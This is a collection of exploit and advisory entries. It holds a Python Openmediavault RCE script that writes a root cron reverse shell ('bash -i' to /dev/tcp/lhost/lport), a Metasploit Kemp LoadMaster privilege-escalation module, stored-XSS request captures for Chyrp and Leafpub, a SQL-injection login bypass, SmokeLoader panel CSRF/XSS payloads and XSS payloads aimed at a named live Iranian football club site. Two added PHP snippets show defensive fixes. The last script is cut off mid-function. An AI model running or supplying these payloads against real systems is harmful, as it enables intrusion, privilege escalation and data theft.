<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.AsyncRat
Vulnerability: Arbitrary Code Execution
Description: The malware looks for and executes an x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded, the exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our own process ID and terminate. Leverage RansomLord v3 for DLL generation: while it was written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try and exploit other types of malware. All basic tests were conducted successfully in a virtual machine environment.
Family: AsyncRat
Type: PE32
MD5: 2337b9a12ecf50b94fc95e6ac34b3ecc
SHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9
Vuln ID: MVID-2024-0683
Disclosure: 05/14/2024

Exploit/PoC:
1) Download RansomLord v3
   https://github.com/malvuln/RansomLord
2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)
3) Use the -g flag (Generate Exploit) to output an x32 CRYPTSP.dll, based on an existing vulnerable malware in the victims list.
4) (Optional) Use the -e flag to set up Windows event IOC logging in the registry; this will log the SHA256 hash, full path and filename.


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code>import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from requests.exceptions import RequestException

class Colors:
    RED = '\033[91m'
    GREEN = '\033[1;49;92m'
    RESET = '\033[0m'

# ASCII banner printed with the result (raw string, so the backslashes need no escaping)
BANNER = r"""
 ____ _ ____ _ _ _____ 
 | _ \ ___ __| / ___| ___ ___ | || |___ |
 | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / 
 | |_| | __/ (_| |___) | __/ (_ |____|__ | / / 
 |____/ \___|\__,_|____/ \___|\___| |_|/_/ 
 github.com/DedSec-47 """

def get_cluster_manager_url(base_url, path):
    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
    try:
        response = requests.get(base_url + path)
        response.raise_for_status()
    except RequestException as e:
        print(Colors.RED + f"Error: {e}" + Colors.RESET)
        return None

    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)

    if response.status_code == 200:
        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
        # Use BeautifulSoup to parse the HTML content
        soup = BeautifulSoup(response.text, 'html.parser')

        # Find all 'a' tags with 'href' attribute
        all_links = soup.find_all('a', href=True)

        # Search for the link containing the Alias parameter in the href attribute
        cluster_manager_url = None
        for link in all_links:
            parsed_url = urlparse(link['href'])
            query_params = parse_qs(parsed_url.query)
            alias_value = query_params.get('Alias', [None])[0]

            if alias_value:
                print(Colors.GREEN + "Alias value found" + Colors.RESET)
                cluster_manager_url = link['href']
                break

        if cluster_manager_url:
            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
            return cluster_manager_url
        else:
            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
            return None

    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}" + Colors.RESET)
    return None

def update_alias_value(url):
    # Replace the Alias query parameter with the marker string and rebuild the URL
    parsed_url = urlparse(url)
    query_params = parse_qs(parsed_url.query, keep_blank_values=True)
    query_params['Alias'] = ["<DedSec-47>"]
    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
    return updated_url

def check_response_for_value(url, check_value):
    # The page is vulnerable if the marker is reflected unencoded in the response body
    try:
        response = requests.get(url)
    except RequestException as e:
        print(Colors.RED + f"Error: {e}" + Colors.RESET)
        return
    if check_value in response.text:
        print(Colors.RED + "Website is vulnerable POC by :" + Colors.RESET)
    else:
        print(Colors.GREEN + "Website is not vulnerable POC by :" + Colors.RESET)
    print(Colors.GREEN + BANNER + Colors.RESET)

def main():
    # Create a command-line argument parser
    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")

    # Add a command-line argument for the target (-t/--target)
    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)

    # Add a command-line argument for the URL path (-u/--url)
    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)

    # Parse the command-line arguments
    args = parser.parse_args()

    # Get the cluster manager URL from the specified website
    cluster_manager_url = get_cluster_manager_url(args.target, args.url)

    # Check if the cluster manager URL is found
    if cluster_manager_url:
        # Modify the URL by replacing the Alias value with the marker
        modified_url = update_alias_value(args.target + cluster_manager_url)
        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)

        # Check the response for the value "<DedSec-47>"
        check_response_for_value(modified_url, "<DedSec-47>")

if __name__ == "__main__":
    main()
</code></pre>
<pre><code># Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS

### Steps to Reproduce ###

- Login from the address: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"

<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"

public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"

text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"

11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--
</code></pre>
<pre><code># Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/Leafpub
# Software Link: https://github.com/Leafpub/leafpub
# Version: 1.1.9
# Tested on: MacOS

### Steps to Reproduce ###

- Please login from this address: http://localhost/leafpub/admin/login
- Click on Settings > Advanced
- Enter the following payload into the "Custom Code" area and save it: "><img src=x onerror=alert("Stored")>
- An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /leafpub/api/settings HTTP/1.1
Host: localhost
Cookie: authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 476
Origin: http://localhost
Referer: http://localhost/leafpub/admin/settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on
</code></pre>
<pre><code># Exploit: Prison Management System Using PHP - SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows, XAMPP
# CVE: CVE-2024-33288


# Proof of Concept:
Step 1 - Visit http://localhost/prison/
Step 2 - Click on the Admin Dashboard button; you are redirected to the login page.
Step 3 - Enter username as admin' or '1'='1 and password as 123456
Step 4 - Click Sign In and you will now be logged in as admin.
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kemp LoadMaster Local sudo privilege escalation',
        'Description' => %q{
          This module abuses a feature of the sudo command on Progress Kemp
          LoadMaster. Certain binary files are allowed to automatically elevate
          with the sudo command. This is based off of the file name. Some files
          that have this permission are not write-protected from the default 'bal' user.
          As such, if the file is overwritten with an arbitrary file, it will still
          auto-elevate. This module overwrites the /bin/loadkeys file with another
          executable.
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
          'bwatters-r7' # module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
        ],
        'DisclosureDate' => '2024-03-19',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'SessionTypes' => ['shell', 'meterpreter'],
        'Platform' => ['unix', 'linux'],
        'Targets' => [
          [
            'Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Command',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :command,
              'Payload' =>
              {
                'BadChars' => "\x27",
                'Compat' =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic gawk telnet ssh echo'
                }
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse'
              }
            }
          ]
        ],
        'Privileged' => true
      )
    )
    register_options([
      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])
    ])
  end

  def check
    score = 0
    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
    score += 1 if exists?('/usr/wui/eula.kemp.html')
    vprint_status("Found #{score} indicators this is a KEMP product")
    return CheckCode::Detected if score > 0

    return CheckCode::Safe
  end

  def verify_copy(src, dest, elevate)
    orig_file_hash = file_remote_digestmd5(src)
    vprint_status("Moving #{src} to #{dest}")
    if elevate
      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")
    else
      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")
    end
    return true if file_remote_digestmd5(dest) == orig_file_hash

    print_bad("Copy failed - #{output}")
    false
  end

  def execute_dropper(target_binary, binary_rename, temp_payload_path)
    vprint_status("Writing payload to #{temp_payload_path}")
    write_file(temp_payload_path, generate_payload_exe)
    chmod(temp_payload_path)
    register_file_for_cleanup(temp_payload_path)
    return unless verify_copy(target_binary, binary_rename, false)
    return unless verify_copy(temp_payload_path, target_binary, true)

    vprint_status("Running #{target_binary}")
    cmd_exec("sudo '#{target_binary}'")
  end

  def execute_command(target_binary, binary_rename, cmd)
    vprint_status('Preparing payload command')
    # save copy of target_binary
    return unless verify_copy(target_binary, binary_rename, false)
    return unless verify_copy('/bin/bash', target_binary, true)

    vprint_status('Running payload command')
    vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))
  end

  def exploit
    writable_dir = datastore['WRITABLE_DIR']
    if writable_dir.blank? || (writable_dir[-1] != '/')
      writable_dir += '/'
    end
    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)
    target_binary = datastore['TARGET_BINARY']
    binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
    target_binary_hash = file_remote_digestmd5(target_binary)
    begin
      case target['Type']
      when :dropper
        temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
        execute_dropper(target_binary, binary_rename, temp_payload)
      when :command
        execute_command(target_binary, binary_rename, payload.encoded)
      end
    ensure
      # restore the original binary if it was replaced
      unless target_binary_hash == file_remote_digestmd5(target_binary)
        cmd_exec("sudo rm '#{target_binary}'")
        verify_copy(binary_rename, target_binary, true)
        cmd_exec("sudo rm '#{binary_rename}'")
      end
    end
    if target_binary_hash == file_remote_digestmd5(target_binary)
      print_good("#{target_binary} returned to original contents")
    else
      print_bad("#{target_binary} was not returned to original contents")
    end
  end
end
</code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Panel.SmokeLoader
Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSS
Family: SmokeLoader
Type: Web Panel
MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php)
SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743
Vuln ID: MVID-2024-0682
Disclosure:
Description: The smokebot admin web panel is written in PHP for remote administration capability.

The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using the POST method; however, there is no CSRF security token used by the FORM. Such a token is unique per session, embedded in the FORM and used as a challenge to the server, to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user into visiting an attacker-controlled webpage or clicking an infected link can cause the panel user to submit FORMS on the attacker's behalf. This may result in code execution, data theft or GEO location disclosure.
The CSRF to XSS results in a stored JS payload in the smoke MySQL database table "plugins".

hash fgfilter fakedns_rules filesearch_rules procmon_rules ddos_rules keylog_rules fgcookies miner_rules
93666df0833e0b63917e5373812613 0 ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...


Exploit/PoC:
1) CSRF to add your own Miner Pool

%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E
Pool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E
Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E
%3Cinput type="hidden" name="mode" value="miner"%3E
%3Cinput type="submit" value="SAVE"%3E
%3Cscript%3Edocument.forms[0].submit()%3C/script%3E
%3C/form%3E

2) CSRF to Persistent XSS

%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E
Pool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E
Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E
%3Cinput type="hidden" name="mode" value="miner"%3E
%3Cinput type="submit" value="SAVE"%3E
%3Cscript%3Edocument.forms[0].submit()%3C/script%3E
%3C/form%3E
</code></pre>
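The control the advisory says is missing, written here as an added example and not as SmokeLoader's own code: a per-session CSRF token issued into the miner form and verified before a POST is honoured. Field names follow the PoC form; the handler layout and the `control.php?page=miner` action are assumptions.

```php
<?php
// Added example, not SmokeLoader panel code: a per-session CSRF token for the
// POST form that control.php handles as "mode=miner". Field names follow the
// advisory's PoC; the surrounding handler structure is assumed.

// Cookie flags are defence in depth: SameSite=Lax keeps the session cookie off
// most cross-site POSTs even before the token is checked.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One random token per session, created on first use and reused until logout.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

function csrf_field(): string
{
    // Hidden input carrying the session token; the value is hex, so escaping is purely defensive.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_valid(array $post, string $expected): bool
{
    // A missing, non-string or foreign token rejects the request; hash_equals avoids timing leaks.
    $sent = $post['csrf_token'] ?? null;
    return is_string($sent) && $sent !== '' && hash_equals($expected, $sent);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['mode'] ?? '') === 'miner') {
    if (!csrf_valid($_POST, $_SESSION['csrf_token'])) {
        // A forged cross-site submission never sees the token, so it stops here.
        http_response_code(403);
        exit('Forbidden: missing or invalid CSRF token');
    }
    // The request came from this session's own form; miner_pool, miner_login and
    // miner_pass may now be processed. They remain untrusted input and must go
    // through htmlspecialchars() wherever they are echoed back into a page.
}
?>
<form method="post" action="control.php?page=miner">
  <?= csrf_field() ?>
  Pool: <input type="text" name="miner_pool" size="30">
  Login: <input type="text" name="miner_login" size="20">
  Password: <input type="password" name="miner_pass" size="20">
  <input type="hidden" name="mode" value="miner">
  <input type="submit" value="SAVE">
</form>
```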
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Panel.SmokeLoader
Vulnerability: Cross Site Scripting (XSS)
Family: SmokeLoader
Type: Web Panel
MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php)
SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743
Vuln ID: MVID-2024-0681
Disclosure: 05/11/2024
Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] as the form action. This is a superglobal variable that returns the filename of the currently executing script. There is no secure coding practice of filtering input or sanitizing output, e.g. "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link can trigger arbitrary client-side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface.

PHP snippet:

if ($_GET["mode"] === "reports"){
    $url_pattern = $_GET["logs_sru"];
    $id_pattern = $_GET["logs_sri"];

$action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports";
%3Cform method=\"get\" action=\"{$action}\"%3E

Interestingly, they use the PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database.

$r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'");
while ($v = mysqli_fetch_assoc($r)){
    $stealer_host = htmlspecialchars($v["host"]);

However, it doesn't wrap $_SERVER["PHP_SELF"] in the {$action} variable that the FORM uses as its action and that handles user input.

Exploit/PoC:
1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=1
2) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E
3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E
4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3E
</code></pre>
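The unescaped form action from the advisory's snippet next to a hardened rendering, as an added example that is not the panel's code. The variable names come from the advisory; the assumption that logs_sri and logs_sru are echoed back into input values, and the demo() helper, are mine.

```php
<?php
// Added example, not SmokeLoader panel code: the advisory's unescaped form action
// beside a hardened rendering. Variable names follow the advisory's snippet; that
// the two search patterns are echoed back into the form is an assumption.

function h($value): string
{
    // Escape for HTML text and attribute context. ENT_QUOTES covers both quote
    // styles, so a value such as "/><script> cannot close the attribute or the tag.
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern from the advisory: PHP_SELF and the GET patterns reach the markup raw.
function render_reports_form_vulnerable(string $php_self, array $get): string
{
    $action = $php_self . "?page=stealer&mode=reports";
    $url_pattern = $get["logs_sru"] ?? '';
    $id_pattern = $get["logs_sri"] ?? '';
    return "<form method=\"get\" action=\"{$action}\">"
        . "<input type=\"hidden\" name=\"page\" value=\"stealer\">"
        . "<input type=\"hidden\" name=\"mode\" value=\"reports\">"
        . "<input type=\"text\" name=\"logs_sri\" value=\"{$id_pattern}\">"
        . "<input type=\"text\" name=\"logs_sru\" value=\"{$url_pattern}\">"
        . "</form>";
}

// Hardened: the action is the script's own basename (PHP_SELF would echo
// attacker-supplied PATH_INFO), and every reflected value goes through h().
function render_reports_form_hardened(array $get): string
{
    $action = h(basename($_SERVER['SCRIPT_NAME'] ?? 'control.php'));
    $url_pattern = h($get["logs_sru"] ?? '');
    $id_pattern = h($get["logs_sri"] ?? '');
    return "<form method=\"get\" action=\"{$action}\">"
        . "<input type=\"hidden\" name=\"page\" value=\"stealer\">"
        . "<input type=\"hidden\" name=\"mode\" value=\"reports\">"
        . "<input type=\"text\" name=\"logs_sri\" value=\"{$id_pattern}\">"
        . "<input type=\"text\" name=\"logs_sru\" value=\"{$url_pattern}\">"
        . "</form>";
}

function demo(): array
{
    // Constructed input shaped like the advisory's PoC: close the attribute, then open a script tag.
    $get = ['logs_sri' => '"/><script>alert(1)</script>', 'logs_sru' => ''];
    $vulnerable = render_reports_form_vulnerable('/SmokeLoader/control1.php', $get);
    $hardened = render_reports_form_hardened($get);
    return [
        // true: the raw value produced a live <script> element inside the form
        'vulnerable_has_script_tag' => str_contains($vulnerable, '<script>'),
        // false: the escaped value stays inside the attribute as text
        'hardened_has_script_tag' => str_contains($hardened, '<script>'),
        // true: quotes and angle brackets were entity-encoded by h()
        'hardened_value_encoded' => str_contains($hardened, '&quot;/&gt;&lt;script&gt;'),
    ];
}

print_r(demo());
```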
<pre><code>
EXPLOIT XSS Esteghlal F.C. (Esteghlal Tehran Football Club) Site

https://fcesteghlal.ir suffers from a remote XSS vulnerability.
This security incident was reported by the SOC and Maher team and prevention centers and was ignored;
the site has not responded to their reports, so we are posting this to add visibility to the issue.

###################################################################################################
#
# Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability.
#
# Author : E1.Coders
#
# Contact : E1.Coders [at] Mail [dot] RU
#
# Portal Link : https://fcesteghlal.ir/
#
# Security Risk : high
#
# Description : All sites coded and designed by novinvision
#
# DorK : fcesteghlal.ir/search?term=
#
###################################################################################################
#
# Expl0iTs: https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)>
#
# https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>
</code></pre>
<pre><code># Exploit Title: Openmediavault < 7.0.32 Authenticated RCE & Local Privilege Escalation
# Date: 08.05.2024
# Exploit Author: Mert BENADAM
# Vendor Homepage: https://www.openmediavault.org/
# Software Link: https://sourceforge.net/projects/openmediavault/
# Version: < 7.0.32
# Tested on: OMV 7.0.32 & 6.5 @Virtual Machine
# Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.


# Special Thx: k3yZ :)
"""
PoC:
This vulnerability occurs when users in the web-admin group enter commands in the crontab by selecting the root shell.
As a result of exploiting the vulnerability, authenticated web-admin users can run commands with root privileges and receive reverse shell connections.
It can also be used in privilege escalation attacks on local systems.
"""

import argparse
import requests
import json

def login(ip_address, username, password, lhost, lport):
    try:
        login_data = {
            "service": "Session",
            "method": "login",
            "params": {
                "username": username,
                "password": password
            },
            "options": None
        }

        url = f"http://{ip_address}/rpc.php"

        response = requests.post(url, json=login_data)

        if response.status_code == 200:
            print("Login Success, Checking User Privileges...")
            post_check(ip_address, response.cookies, lhost, lport)
        else:
            print("Login Failed, Probably Wrong User Credentials...")
            print("Reason:")
            print(response.json())

    except requests.exceptions.ConnectionError:
        print("Connection Error: Could Not Connect To The Server...")
    except Exception as e:
        print("Unexpected Error:", e)

def post_check(ip_address, cookies, lhost, lport):
    try:
        post_data = {
            "service": "Cron",
            "method": "getList",
            "params": {
                "type": ["userdefined"],
                "start": 0,
                "limit": -1
            },
            "options": None
        }

        url = f"http://{ip_address}/rpc.php"
        response = requests.post(url, json=post_data, cookies=cookies)

        if response.status_code == 200:
            print("Accessing Crons...OK")
            send_post(ip_address, cookies, lhost, lport)
        elif response.status_code == 403:
            print("Kullanıcı yetkili değil.")
        else:
            print("Post Request Failure...")

    except requests.exceptions.ConnectionError:
        print("Connection Error: Could Not Connect To The Server...")
    except Exception as e:
        print("Beklenmeyen bir hata oluştu:", e)

def send_post(ip_address, cookies, lhost, lport):
    try:
        post_data = {
            "service": "Cron",
            "method": "set",
            "params": {
                "uuid": "fa4b1c66-ef79-11e5-87a0-0002b3a176b4", # UUID
                "enable": True,
                "execution": "exactly",
                "minute": ["*"],
                "everynminute": False,
                "hour": ["*"],
                "everynhour": False,
                "dayofmonth": ["*"],
                "everyndayofmonth": False,
                "month": ["*"],
                "dayofweek": ["*"],
                "username": "root",
                "command": f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport} <&1'", # Command From User
                "sendemail": False,
                "comment": "",
                "type": "userdefined"
            },
            "options": None
        }

        url = f"http://{ip_address}/rpc.php"
        response = requests.post(url, json=post_data, cookies=cookies)

        if response.status_code == 200:
            print("Payload Sent... OK,")
            update(ip_address, cookies)
        elif response.status_code == 403:
            print("User Not Authorized.")
        else:
            print("Something Wrong. CHECK your version...")

    except requests.exceptions.ConnectionError:
        print("Connection Error: Could Not Connect To The Server...")
    except Exception as e:
        print("Unexpected Error:", e)


def update(ip_address, cookies):
    try:
        post_data = {
            "service": "Config",
            "method": "applyChangesBg",
            "params": {
                "modules": [],
                "force": False
            },
            "options": None
        }

        url = f"http://{ip_address}/rpc.php"

        response = requests.post(url, json=post_data, cookies=cookies)

        if response.status_code == 200:
            print("Updating crontabs...")
            print("Successfully Exploited...")
            print("Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener...")
            print("Warning: Make sure You Open a listener And Enter Correct IP-PORT Information...")
        elif response.status_code == 403:
            print("User Not Authorized.")
        else:
            print("Something Wrong. Check version...")

    except requests.exceptions.ConnectionError:
        print("Connection Error: Could Not Connect To The Server...")
    except Exception as e:
        print("Unexpected Error:", e)


def main():
    font = """

███╗ ██╗ ██████╗ ███╗ ███╗███████╗██████╗ ██████╗██╗ ██╗ ██████╗ ██████╗
████╗ ██║██╔═══██╗████╗ ████║██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔═████╗██╔═████╗
██╔██╗ ██║██║ ██║██╔████╔██║█████╗ ██████╔╝██║ ╚████╔╝ ██║██╔██║██║██╔██║
██║╚██╗██║██║ ██║██║╚██╔╝██║██╔══╝ ██╔══██╗██║ ╚██╔╝ ████╔╝██║████╔╝██║
██║ ╚████║╚██████╔╝██║ ╚═╝ ██║███████╗██║ ██║╚██████╗ ██║ ╚██████╔╝╚██████╔╝
╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═════╝

    """
    parser = argparse.ArgumentParser(description="OpenMediaVault 7.0.32 > 6.5.0 RCE And Local Privilege Escalation")
